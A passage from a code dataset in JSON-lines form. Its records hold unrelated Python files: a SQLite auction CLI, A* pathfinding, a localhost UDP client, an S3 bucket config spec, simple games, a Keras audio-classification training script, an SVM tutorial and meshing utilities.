LEFT OUTER JOIN previews pr ON p.pid = pr.pid \n group by p.pid\n \t order by count(distinct s.sid) DESC;\n\n ''' \n\n cursor.execute(listProduct_query)\n\n productList = cursor.fetchall()\n \n\n if len(productList) > 1:\n\n for product in productList:\n\n print(product)\n isTrue = True\n\n #if there is no productList, then there's no product to perform additional actions on. \n else: \n isTrue = False\n return\n\n while(isTrue):\n \n isTrue = False\n\n command = input(''' Enter the following key for the corresponding functions\n\n a - to write a review\n\n b - to view reviews of a product\n\n c - to view all active sales associated to the product\n\n ''')\n\n \n\n #if more than 1 character/command entered(Error) \n\n if(len(command) > 1):\n\n print('Invalid command, try again')\n \n isTrue = True\n\n continue #goes to end of loop\n\n \n\n #if invalid character(not 'a','b' or 'c') entered\n\n if(command != 'a' and command != 'b' and command != 'c'): ##check\n\n print('Invalid Command')\n \n isTrue = True\n\n continue #goes to end of loop\n\n \n\n #check for what command is entered and take actions accordingly \n\n if(command == 'a'):\n\n productId = input('''Please enter the pid of the product that you wish to write a review on: ''')\n\n\n write_review(productList,productId, cursor, connection, email)\n\n \n\n if(command == 'b'):\n\n productId = input('''Please enter the pid of the product you wish to view: ''')\n\n view_review(productList,productId, cursor, connection)\n\n \n\n if(command == 'c'):\n\n productId = input('Please enter the pid of the product that you want to see the sales associated with it: ')\n\n view_activeSales(productList,productId, cursor, connection, email)\n\n connection.commit()\n\n\n#function that allows to view review on the product listed \ndef view_review(productList,pid, cursor, connection):\n\n isExists = False\n\n print(pid)\n #checks if the pid entered by the user is a valid pid from the productList\n for each in productList:\n\n\n if( pid == each[0]):\n\n isExists = True\n\n break\n\n \n if(isExists):\n\n cursor.execute(''' SELECT pr.rid, pr.pid, pr.reviewer, AVG(pr.rating), pr.rtext, pr.rdate \n\n FROM products p, previews pr\n \n WHERE p.pid = pr.pid\n AND pr.pid LIKE ?\n group by pr.rid, pr.pid, pr.reviewer, pr.rtext, pr.rdate;\n ''', (pid,))\n\n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n \n \n else:\n\n print(\"Wrong Pid entered\")\n\n connection.commit()\n\n \n\n \n\n \n#function that allows users to write reviews on their chosen product\ndef write_review(productlist,pid, cursor, connection, email):\n\n\n userReview = input(\"Enter a review text: \")\n userRating = int(input(\"Enter a rating(between 1 - 5 inclusive): \"))\n\n\n for each in productlist:\n\n if( pid == each[0]):\n\n isExists = True\n\n break\n\n \n \n if(isExists):\n\n cursor.execute(''' SELECT rid FROM previews; ''')\n allIds = cursor.fetchall()\n new_rid = getNewId(allIds, cursor, connection)\n if(userRating >= 1 and userRating <= 5):\n\n cursor.execute(''' INSERT INTO previews VALUES\n\n (?,?,?,?,?,Date('now'));''', (new_rid, pid, email, userRating, userReview))\n \n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n\n \n\n else:\n print(\"Invalid rating entered\")\n\n connection.commit()\n\n\n\n#function that allows to view active sales associated to the product \n#then asks the user if they want to see more info on the active sales listed \ndef view_activeSales(productList,pid, cursor, connection, email): \n\n\n isExists = False\n\n for each in productList:\n\n if( pid == each[0]):\n\n isExists = True \n\n break\n\n \n \n if(isExists):\n\n activeSales = cursor.execute('''SELECT s.sid, s.descr, s.rprice, strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 \nFROM sales s, products p\nWHERE s.sid not in (select s.sid \n\t\tfrom sales s, bids b\n\t\twhere s.sid = b.sid)\nand edate > date('now') and s.pid = ?\nUNION \nSelect s.sid, s.descr, max(b.amount), strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60\nfrom sales s, bids b, products p \nwhere s.sid = b.sid and edate > date('now') and s.pid = ?\ngroup by s.descr, s.sid order by strftime('%s',s.edate) / 60 - strftime('%s','now') / 60''',(pid, pid))\n\n \n \n result = cursor.fetchall()\n \n for each in result:\n print(each)\n \n choice4 = input(\"Do you want to see more info about a sale? (y/n)\")\n if(choice4 == 'y'):\n moreInfo_q1(result, email, cursor, connection)\n connection.commit()\n return;\n\n \n\n else:\n print(\"Wrong Pid entered\")\n\n return\n \ndef moreInfo_q1(results, user, cursor, connection):\n # Gets more information about a certain sale!\n ''' including the email of the lister, the rating of the lister (which includes the number of reviews and the average rating), the sale description, the sale end date and time, the condition, and the maximum bid or the reserved price (if there is no bid). If the sale is associated to a product, the result will also include the product description and the product rating, which includes the number of reviews and the average rating if available or a text that the product is not reviewed\n '''\n # check if its accurate\n chosenSid = input(\"What sales do you want to know more information about?: \")\n valid = validate_sid_q1(results, chosenSid)\n if(not valid):\n print(\"Invalid sid\")\n return False\n # Query the data\n cursor.execute('''select sales.lister, COUNT(reviews.rating), AVG(reviews.rating), sales.descr, sales.edate, sales.cond, sales.rprice, products.descr, COUNT(previews.rating), AVG(previews.rating) \nFROM sales left outer join reviews on reviews.reviewee = sales.lister, products left outer join previews on previews.pid = products.pid\nWHERE sales.sid not in (select sales.sid \n\t\tfrom sales, bids\n\t\twhere sales.sid = bids.sid)\nand edate > date('now')\nand sales.sid LIKE ?\nand products.pid = sales.pid\ngroup by sales.lister, sales.descr, sales.edate, sales.cond, sales.rprice, products.descr\nUNION \nselect sales.lister, COUNT(reviews.rating), AVG(reviews.rating), sales.descr, sales.edate, sales.cond, max(bids.amount), products.descr, COUNT(distinct previews.rating), AVG(previews.rating) \nfrom sales left outer join reviews on sales.lister = reviews.reviewee, bids, products left outer join previews on products.pid = previews.pid\nwhere sales.sid = bids.sid and edate > date('now')\nand sales.sid LIKE ?\nand products.pid = sales.pid\ngroup by sales.lister, sales.descr, sales.edate, sales.cond, products.descr; \n\n''',(chosenSid,chosenSid))\n # Get results table and format\n results = cursor.fetchall()\n print('\\nColumns (Top to bottom):\\nLister | Num ratings | AVG rating | descr | edate | cond | price | Max bid | pdesc | Num previews | AVG prating\\n')\n for info in results:\n for test in info:\n if(test == None):\n print(\"There are no product reviews\")\n else:\n print(test)\n print(\"\", end = '\\n')\n connection.commit()\n # Give user choice on what to do next! -> Bid, list active seller sale, see reviews of the seller!\n choice3 = input(\"Would you like to place a bid? (1) List all active sales of the seller (2) or List all reviews of the seller? (3): \")\n if(choice3 == '1'):\n place_bid_q1(chosenSid, user, results, connection, cursor)\n elif(choice3 == '2'):\n cursor.execute('''SELECT distinct lister from sales where sid LIKE ?''', (chosenSid,))\n result = cursor.fetchone()\n email = result[0]\n list_active_seller_sales_q1(email, cursor, connection)\n elif(choice3 == '3'):\n cursor.execute('''SELECT distinct lister from sales where sid LIKE ?''', (chosenSid,))\n result = cursor.fetchone()\n email = result[0]\n get_reviews_seller_q1(email, cursor, connection)\n else:\n return\n return True\n\ndef validate_sid_q1(results, sid):\n # Validate an entered sid\n valid = False\n for result in results:\n if result[0].upper() == sid.upper():\n valid = True\n break\n return valid \n \ndef place_bid_q1(sid, user, results, connection, cursor):\n # Place a bid on a sale entered by the user (by sid)\n amount = float(input(\"Enter a bid amount: \"))\n cursor.execute(\"SELECT MAX(amount) FROM bids WHERE sid LIKE ?\", (sid,))\n result = cursor.fetchone()\n connection.commit()\n # Check to make sure that the bid is high enough! (Greater than previous max bid!) -> Still need to integrate random bid generator!!\n if(result[0] == None or result[0] < amount):\n cursor.execute(''' SELECT bid FROM bids; ''')\n allIds = cursor.fetchall()\n bid_id = getNewId(allIds, cursor, connection)\n insertions = (bid_id, user, sid, amount)\n cursor.execute(\"INSERT INTO bids VALUES(?, ?, ?, date('now'), ?)\", insertions)\n connection.commit()\n print(\"Bid successfully placed!\")\n else:\n print(\"Bid amount not high enough!\")\n return\n\ndef list_active_seller_sales_q1(lister, cursor, connection):\n # Query the data to list all the active sales of the seller of a sale!\n cursor.execute('''SELECT s.descr, s.sid, s.rprice, strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 \nFROM sales s\nWHERE s.sid not in (select s.sid \n\t\tfrom sales s, bids b\n\t\twhere s.sid = b.sid)\nand edate > date('now') and s.lister LIKE ?\nUNION \nSelect s.descr, s.sid, max(b.amount), strftime('%s',s.edate) / 86400 - strftime('%s','now') / 86400, strftime('%s',s.edate) / 3600 - strftime('%s','now') / 3600, strftime('%s',s.edate) / 60 - strftime('%s','now') / 60\nfrom sales s, bids b \nwhere s.sid = b.sid and edate > date('now') and s.lister LIKE ?\ngroup by s.descr, s.sid ORDER by strftime('%s',s.edate) / 60 - strftime('%s','now') / 60 ;''', (lister, lister))\n results = cursor.fetchall()\n print('\\n')\n for result in results:\n print(result)\n connection.commit()\n\ndef get_reviews_seller_q1(lister, cursor, connection):\n # Query the data to get all of the reviews of a given seller of a sale!\n cursor.execute('''SELECT reviewer, rating, rtext, rdate FROM reviews WHERE reviewee LIKE ? ''', (lister,))\n results = cursor.fetchall()\n print('\\n')\n for result in results:\n print(result)\n connection.commit()\n\n\n\n \n\n \n\n \n\n\t\n\n \n\n\n","sub_path":"productBid.py","file_name":"productBid.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"378690179","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nimport os\n\n\nclass PathFindObject:\n def __init__(self, x, y, cost = 1):\n self.x = x\n self.y = y\n self.cost = cost\n self.camefrom = None\n self.gscore = np.inf\n self.fscore = np.inf\n\n @property\n def position(self):\n return np.array([self.x, self.y])\n\n def __call__(self):\n return np.array((self.x,self.y))\n\n\ndef heuristic(pos1, pos2):\n return np.linalg.norm(pos1 - pos2)\n\n\ndef reconstruct_path(target):\n path = [target.position]\n current = target\n while current.camefrom is not None:\n path.append(current.camefrom.position)\n current = current.camefrom\n\n return np.array(path)[::-1]\n\n\ndef find_path(start, target, map_grid):\n target_position = target.position\n start_position = start.position\n\n start.camefrom = None\n start.gscore = 0\n start.fscore = heuristic(start_position, target_position)\n\n open_set = [start]\n open_set_fscores = [start.fscore]\n closed_set = []\n\n map_size = map_grid.shape\n\n while len(open_set) > 0:\n ind = np.argmin(open_set_fscores)\n current = open_set[ind]\n\n if current == target:\n for item in open_set + closed_set:\n item.fscore = np.inf\n item.gscore = np.inf\n return reconstruct_path(target)\n \n open_set.pop(ind)\n open_set_fscores.pop(ind)\n\n closed_set.append(current)\n\n current_pos = current.position\n for i in range(-1, 2):\n for j in range(-1, 2):\n if i == j == 0:\n continue\n \n other_x = current_pos[0] + j\n other_y = current_pos[1] + i\n\n if other_x < 0 or other_x >= map_size[1]:\n continue\n if other_y < 0 or other_y >= map_size[0]:\n continue\n \n neighbor = map_grid[other_y, other_x]\n neighbor_pos = neighbor.position\n\n tentative_gscore = current.gscore + np.linalg.norm([i, j])*neighbor.cost\n\n if tentative_gscore < neighbor.gscore:\n neighbor.camefrom = current\n neighbor.gscore = tentative_gscore\n neighbor.fscore = tentative_gscore + heuristic(neighbor_pos, target_position)\n\n if neighbor not in open_set:\n open_set.append(neighbor)\n open_set_fscores.append(neighbor.fscore)\n else:\n ind = open_set.index(neighbor)\n open_set_fscores[ind] = neighbor.fscore\n \n\ndef plot_path(path, linestyle = \"-\", color = \"black\"):\n path = np.array(path)\n #path[:,1] = len(path[:,1]) - path[:,1]\n plt.plot(path[0][0], path[0][1], marker = \"x\", color = \"red\")\n plt.plot(path[-1][0], path[-1][1], marker = \"x\", color = \"blue\")\n current_pos = path[0]\n for pos in path[1:]:\n plt.plot([current_pos[0], pos[0]], [current_pos[1], pos[1]], color = color, linestyle = linestyle)\n current_pos = pos\n\n plt.axis(\"equal\")\n\n\nif __name__ == \"__main__\":\n with open(\"maptxt_1.txt\", \"r\") as infile:\n lines = infile.readlines()\n height = len(lines)\n width = len(lines[0].strip())\n\n grid = np.zeros((height, width))\n\n print(grid.shape)\n\n for i, row in enumerate(lines):\n for j, item in enumerate(row.strip()):\n if item == \"1\":\n grid[i,j] = 1\n\n grid = grid.T\n\n plt.imshow(grid)\n\n map_grid = np.empty(shape = grid.shape, dtype = PathFindObject)\n for i, row in enumerate(grid):\n for j, val in enumerate(row):\n if val == 1:\n map_grid[i, j] = PathFindObject(j, i, np.inf)\n else:\n map_grid[i, j] = PathFindObject(j, i)\n\n target = map_grid[0, 0]\n\n begin = time.time()\n for i in range(32):\n for j in range(32):\n start = map_grid[i, j]\n find_path(start, target, map_grid)\n time_elapsed = time.time() - begin\n\n count = 32*32\n print(f\"Python: {count} paths computed in:\")\n print(f\"{time_elapsed:2.3f} seconds\")\n print(f\"{time_elapsed/count:2.3f} seconds/path\")\n\n os.system(\"pathfinding.exe\")","sub_path":"python_pathfinding.py","file_name":"python_pathfinding.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"25356592","text":"#!/usr/bin/python\n\nimport socket\nimport random\n\ndef makeList():\n message = []\n for i in range(random.randint(5,20)):\n message.append(random.randint(0,10))\n return message\n\nfor pings in range(10):\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n client_socket.settimeout(1.0)\n message_org = makeList()\n message = bytearray(message_org)\n addr = (\"127.0.0.1\", 22222)\n client_socket.sendto(message, addr)\n try:\n data, server = client_socket.recvfrom(1024)\n print(list(data))\n print(message_org)\n except socket.timeout:\n print('REQUEST TIMED OUT')\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"267694470","text":"from aws_syncr.option_spec.statements import resource_policy_statement_spec, resource_policy_dict\nfrom aws_syncr.formatter import MergedOptionStringFormatter\nfrom aws_syncr.option_spec.documents import Document\nfrom aws_syncr.errors import BadTemplate\n\nfrom input_algorithms.spec_base import NotSpecified\nfrom input_algorithms import spec_base as sb\nfrom input_algorithms.spec_base import Spec\nfrom input_algorithms.dictobj import dictobj\n\nfrom option_merge import MergedOptions\nimport six\n\nclass buckets_spec(Spec):\n def normalise(self, meta, val):\n if 'use' in val:\n template = val['use']\n if template not in meta.everything['templates']:\n available = list(meta.everything['templates'].keys())\n raise BadTemplate(\"Template doesn't exist!\", wanted=template, available=available, meta=meta)\n\n val = MergedOptions.using(meta.everything['templates'][template], val)\n\n formatted_string = sb.formatted(sb.string_or_int_as_string_spec(), MergedOptionStringFormatter, expected_type=six.string_types)\n bucket_name = meta.key_names()['_key_name_0']\n\n original_permission = sb.listof(resource_policy_dict()).normalise(meta.at(\"permission\"), NotSpecified if \"permission\" not in val else val[\"permission\"])\n deny_permission = sb.listof(resource_policy_dict(effect='Deny')).normalise(meta.at(\"deny_permission\"), NotSpecified if \"deny_permission\" not in val else val[\"deny_permission\"])\n allow_permission = sb.listof(resource_policy_dict(effect='Allow')).normalise(meta.at(\"allow_permission\"), NotSpecified if \"allow_permission\" not in val else val[\"allow_permission\"])\n\n val = val.wrapped()\n val['permission'] = original_permission + deny_permission + allow_permission\n return sb.create_spec(Bucket\n , name = sb.overridden(bucket_name)\n , location = sb.required(formatted_string)\n , permission = sb.container_spec(Document, sb.listof(resource_policy_statement_spec('bucket', bucket_name)))\n , tags = sb.dictof(sb.string_spec(), formatted_string)\n ).normalise(meta, val)\n\nclass Buckets(dictobj):\n fields = ['items']\n\n def sync_one(self, aws_syncr, amazon, bucket):\n \"\"\"Make sure this bucket exists and has only attributes we want it to have\"\"\"\n if bucket.permission.statements:\n permission_document = bucket.permission.document\n else:\n permission_document = \"\"\n\n bucket_info = amazon.s3.bucket_info(bucket.name)\n if not bucket_info:\n amazon.s3.create_bucket(bucket.name, permission_document, bucket.location, bucket.tags)\n else:\n amazon.s3.modify_bucket(bucket_info, bucket.name, permission_document, bucket.location, bucket.tags)\n\nclass Bucket(dictobj):\n fields = {\n 'name': \"Name of the bucket\"\n , 'location': \"The region the bucket exists in\"\n , 'permission': \"The permission statements to attach to the bucket\"\n , 'tags': \"The tags to associate with the bucket\"\n }\n\ndef __register__():\n return {(80, \"buckets\"): sb.container_spec(Buckets, sb.dictof(sb.string_spec(), buckets_spec()))}\n\n","sub_path":"aws_syncr/option_spec/buckets.py","file_name":"buckets.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"398422255","text":"from random import randint\nplayer=input('rock(r),paper(p), or scissors(s)?')\nprint(player, 'vs')\ncomputer=randint(1,3)\nprint(computer)\nif computer==1:\n\tcomputer_choice='r'\nelif computer==2:\n\tcomputer_choice='p'\nelse:\n\tcomputer_choice='s'\nprint(computer)\nif player=='r' and computer=='p':\n\tprint('Computer wins because paper covers rock')\nelif player=='s' and computer=='r':\n\tprint('Computer wins because rock smashes scissors')\nelif player=='p' and computer=='s':\n\tprint('Computer wins because scissors cuts paper')\nelif computer=='r' and player=='p':\n\tprint('Player wins because paper covers rock')\nelif computer=='s' and player=='r':\n\tprint('Player wins because rock smashes scissors')\nelif computer=='p' and player=='s':\n\tprint('Player wins because scissors cuts paper')\nelse:\n\tif player==computer:\n\t\tprint('Its a tie')\nPlay_again=input('would you like to play again?')\nif Play_again==y:\n\tprint(player)\nelse:\n\tprint('Game Over')","sub_path":"Rock paper Scissors.py","file_name":"Rock paper Scissors.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"109184566","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\nimport numpy as np\nimport keras\nimport tensorflow\nfrom keras.optimizers import SGD\n\nimport sys\nsys.path.append(\"..\")\nfrom utils import *\nfrom funcs import *\n\nfrom small_fcnn_att import model_fcnn\nfrom training_functions import *\n\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\ndata_path = 'data_2020/'\ntrain_csv = data_path + 'evaluation_setup/fold1_train.csv'\nval_csv = data_path + 'evaluation_setup/fold1_evaluate.csv'\nfeat_path = 'features/logmel128_scaled_d_dd/'\nexperiments = 'exp_smallfcnn'\n\nif not os.path.exists(experiments):\n os.makedirs(experiments)\n\n# random sample data, to keep all three classes have similar number of training samples\ntotal_csv = balance_class_data(train_csv, experiments)\n\nnum_audio_channels = 2\nnum_freq_bin = 128\nnum_time_bin = 461\nnum_classes = 3\nmax_lr = 0.1\nbatch_size = 32\nnum_epochs = 500\nmixup_alpha = 0.4\nsample_num = len(open(train_csv, 'r').readlines()) - 1\n\n\ndata_val, y_val = load_data_2020(feat_path, val_csv, num_freq_bin, 'logmel')\ny_val = keras.utils.to_categorical(y_val, num_classes)\n\nmodel = model_fcnn(num_classes, input_shape=[num_freq_bin, num_time_bin, 3*num_audio_channels], num_filters=[8, 14, 20], wd=0)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer =SGD(lr=max_lr, decay=0, momentum=0.9, nesterov=False),\n metrics=['accuracy'])\n\nmodel.summary()\n\nlr_scheduler = LR_WarmRestart(nbatch=np.ceil(sample_num/batch_size), Tmult=2,\n initial_lr=max_lr, min_lr=max_lr*1e-4,\n epochs_restart = [3.0, 7.0, 15.0, 31.0, 63.0,127.0,255.0]) \nsave_path = experiments + \"/model-{epoch:02d}-{val_acc:.4f}.hdf5\"\ncheckpoint = keras.callbacks.ModelCheckpoint(save_path, monitor='val_acc', verbose=1, save_best_only=False, mode='max')\ncallbacks = [lr_scheduler, checkpoint]\n\ntrain_data_generator = Generator_balanceclass_timefreqmask_nocropping_splitted(feat_path, train_csv, total_csv, experiments, num_freq_bin, \n batch_size=batch_size,\n alpha=mixup_alpha, splitted_num=4)()\n\nhistory = model.fit_generator(train_data_generator,\n validation_data=(data_val, y_val),\n epochs=num_epochs, \n verbose=1, \n workers=4,\n max_queue_size = 100,\n callbacks=callbacks,\n steps_per_epoch=np.ceil(sample_num/batch_size)\n ) \n\n","sub_path":"task1b/train/train_smallfcnn.py","file_name":"train_smallfcnn.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"321853585","text":"# -*- coding: utf-8 -*-\n\"\"\"Support Vector Machine (SVM) classification for machine learning.\n\nSVM is a binary classifier. The objective of the SVM is to find the best\nseparating hyperplane in vector space which is also referred to as the\ndecision boundary. And it decides what separating hyperplane is the 'best'\nbecause the distance from it and the associating data it is separating is the\ngreatest at the plane in question.\n\nExample:\n\n $ python regularSupportVectorMachine2.py\n\nTodo:\n *\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import confusion_matrix\n\n# importing the dataset\ndataset = pd.read_csv('Social_Network_Ads.csv')\nfeatures = dataset.iloc[:, [2, 3]].values # Country, Age, Salary\nlabels = dataset.iloc[:, 4].values # Purchased\n\n# Splitting the Dataset into a Training set and a Test set\nfeature_train, feature_test, label_train, label_test = train_test_split(\n features, labels, test_size=0.25)\n\n# Feature scaling, normalize scale is important. Especially on algorithms\n# involving euclidian distance. Two main feature scaling formulas are:\n# Standardisation: x_stand = (x-mean(x))/(standard_deviation(x))\n# Normalisation: x_norm = (x-min(x))/(max(x)-min(x))\nsc_feature = StandardScaler()\nfeature_train = sc_feature.fit_transform(feature_train)\nfeature_test = sc_feature.transform(feature_test)\n\n# Fitting the Support Vector Machine Model to the dataset\nclassifier = SVC(kernel='linear')\nclassifier.fit(feature_train, label_train)\n\n# Predicting the results of the Test set\ny_pred = classifier.predict(feature_test)\n\n# Creating the Confusion Matrix\ncm = confusion_matrix(label_test, y_pred)\n\n# Visualize the Training set results\n\"\"\"X_set, y_set = feature_train, label_train\nX1, X2 = np.meshgrid(\n np.arange(\n start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01\n ),\n np.arange(\n start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01\n )\n)\nplt.contourf(\n X1, X2, classifier.predict(\n np.array([X1.ravel(), X2.ravel()]).T\n ).reshape(X1.shape), alpha=0.75, cmap=ListedColormap(('red', 'blue')))\nplt.xlim(X1.min(), X1.max())\nplt.ylim(X2.min(), X2.max())\nfor i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c=ListedColormap(('red', 'blue'))(i), label=j)\nplt.title('Support Vector Machine Model (Training set)')\nplt.xlabel('Age')\nplt.ylabel('Estimated Salary')\nplt.legend()\nplt.show()\"\"\"\n\n\n# Visualize the Test set results\nX_set, y_set = feature_test, label_test\nX1, X2 = np.meshgrid(\n np.arange(\n start=X_set[:, 0].min() - 1, stop=X_set[:, 0].max() + 1, step=0.01\n ),\n np.arange(\n start=X_set[:, 1].min() - 1, stop=X_set[:, 1].max() + 1, step=0.01\n )\n)\nplt.contourf(\n X1, X2, classifier.predict(\n np.array([X1.ravel(), X2.ravel()]).T\n ).reshape(X1.shape), alpha=0.75, cmap=ListedColormap(('red', 'blue')))\nplt.xlim(X1.min(), X1.max())\nplt.ylim(X2.min(), X2.max())\nfor i, j in enumerate(np.unique(y_set)):\n plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],\n c=ListedColormap(('red', 'blue'))(i), label=j)\nplt.title('Support Vector Machine Model (Testing set)')\nplt.xlabel('Age')\nplt.ylabel('Estimated Salary')\nplt.legend()\nplt.show()\n","sub_path":"Classification/SupportVectorMachine/regularSupportVectorMachine2.py","file_name":"regularSupportVectorMachine2.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"297692207","text":"#!/usr/bin/env python\n\nimport os\nimport sys \nimport json\nimport time\nfrom collections import OrderedDict\n\nlib_path = os.path.abspath('../../mdwf_lib')\nsys.path.append(lib_path)\nimport mdwf_functions as mdwf\n\n\"\"\" A python script to help with postprocessing of data of a MD simulation.\"\"\"\n\njobid = sys.argv[1]\njobtype = sys.argv[2]\n\ndef main():\n # open and modify local job details file. \n ljdf_t = mdwf.read_local_job_details_file(\".\", \"local_job_details.json\")\n ljdf_t['CurrentJobId'] = jobid\n ljdf_t['JobStatus'] = 'finished'\n ljdf_t['JobFinishTime'] = str(time.time())\n\n with open(\"local_job_details.json\", 'w') as outfile:\n json.dump(ljdf_t, outfile, indent=2)\n outfile.close()\n\n #check the runtime of the job\n start = float(ljdf_t['JobStartTime'])\n finish = float(ljdf_t['JobFinishTime'])\n limit = int(ljdf_t['JobFailTime'])\n walltime = int(ljdf_t['WallTime'])\n mdwf.check_job_fail(start,finish,limit)\n #mdwf.check_walltime(start,finish,walltime)\n\n #move around and rename files \n name = ljdf_t['JobBaseName']\n run = str(ljdf_t['RunCount'])\n if \"opt\" in jobtype:\n mdwf.redirect_optimization_output(name, run)\n else:\n mdwf.redirect_production_output(name, run)\n\n #create pauseflag if all runs completed\n current = int(ljdf_t['RunCount'])\n total = int(ljdf_t['TotalRuns'])\n mdwf.check_round(current, total)\n\n \n \nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"Setup_and_Config/postjob_processing.py","file_name":"postjob_processing.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"184096746","text":"\"\"\"\nModule containing Cubit commands for creating blocks, nodesets and sidesets.\n\"\"\"\n\n\"\"\"\ncreated by Hans-Henning Schippke\ncreated on 21.08.15\nmodified on 21.08.15\n\"\"\"\n\nimport cubit\nfrom basics import cmd\n\n\n# ===================================================================\n# Functions\n# ===================================================================\n\ndef CreateBlock(blockId, entityIdList, elementType, elementTypeID, matID, loadID):\n \"\"\"\n Function creating a block with 'blockId' and 'elementType'.\n Its name is made up of 'elementTypeID', 'matID' and 'loadID'.\n The block contains the surfaces with IDs listes in 'entityIdList'.\n \"\"\"\n\n if type(entityIdList) == str:\n\n cmd('block ' + str(blockId) + ' surface ' + entityIdList)\n\n else: # entityIdList is a list of integers\n\n cmdString = 'block ' + str(blockId) + ' surface'\n\n for entityId in entityIdList:\n cmdString = cmdString + ' ' + str(entityId)\n\n cmd(cmdString)\n\n cmd('block ' + str(blockId) + ' element type ' + str(elementType))\n cmd('block ' + str(blockId) + ' name \"elementTypeID ' + str(elementTypeID) + \\\n ' matID ' + str(matID) + \\\n ' loadID ' + str(loadID) + '\"')\n\n# ===================================================================\n\n\ndef CreateSideset(id, surfaceIdList):\n \"\"\"\n Function creating a sideset with 'id' and consisting of the surfaces\n listed in 'surfaceIdList'.\n \"\"\"\n\n if type(surfaceIdList) == str:\n\n cmd('sideset ' + str(id) + ' surface ' + surfaceIdList)\n\n else: # surfaceIdList is a list of integers\n\n cmdString = 'sideset ' + str(id) + ' surface'\n\n for entityId in surfaceIdList:\n cmdString = cmdString + ' ' + str(entityId)\n\n cmd(cmdString)\n\n# ===================================================================\n\n\ndef CreateNodesetBC(nodeSetId, nodeSetName, meshGroupId):\n \"\"\"\n Function creating a nodeset with number 'nodeSetId' consisting of the nodes\n summarised in the mesh group with id 'meshGroupId'. The name of the nodeset\n is defined via 'nodeSetName'.\n \"\"\"\n\n cmd('nodeset ' + str(nodeSetId) + ' node in group ' + str(meshGroupId))\n cmd('nodeset ' + str(nodeSetId) + ' name \"' + nodeSetName + ' ' + str(nodeSetId) + '\"')\n\n# ===================================================================\n\n\ndef CreateNodesetIC(nodeSetId, nodeSetName):\n \"\"\"\n Function creating a nodset with number 'nodeSetId' consisting of all nodes\n in all surfaces. The name of the nodeset is defined via 'nodeSetName'.\n \"\"\"\n\n cmd('nodeset ' + str(nodeSetId) + ' node in surface all')\n cmd('nodeset ' + str(nodeSetId) + ' name \"' + nodeSetName + ' ' + str(nodeSetId) + '\"')\n\n# ===================================================================\n\n# ===================================================================\n# end | Functions\n# ===================================================================","sub_path":"myCubitModules/createBlockAndSets.py","file_name":"createBlockAndSets.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"255330632","text":"#import module\nimport random\n\ndef game():\n\n #player guesses\n guess = input('Guess the number')\n guess = int(guess)\n\n\n #points\n pts = int(100)\n while pts >= int(-50):\n\n #Correct\n if int(num) == int(guess):\n print('BINGO! You got ' + str(pts) + 'points!')\n break\n\n\n elif int(num) > int(guess):\n #too low\n #minus pts\n pts = pts - int(10)\n print('The number you guessed is too low!' + '\\n You now have ' + str(pts) + 'points!')\n if pts <= int(-50):\n print('Unfornuately, you lost too much points at ' + str(pts) + 'points. The number I was thinking of was ' + str(num) )\n elif pts > int(-50):\n guess = input('Guess again!')\n\n\n elif int(num) < int(guess):\n #too high\n #minus pts\n pts = pts - int(10)\n print('The number you guessed is too high!' + '\\n You now have ' + str(pts) + 'points!')\n if pts <= int(-50):\n print('Unfortunately, you lost too much points at ' + str(pts) + 'points. The number I was thinking of was ' + str(num) )\n elif pts > int(-50):\n guess = input('Guess again!')\n\ndef end():\n #replay option\n reply = input('Do you want to try again? y/n')\n if reply == 'y':\n game()\n elif reply == 'n':\n exit()\n\n\ndef restart():\n game()\n\ndef exit():\n exit()\n\n#Generate number\nnum = 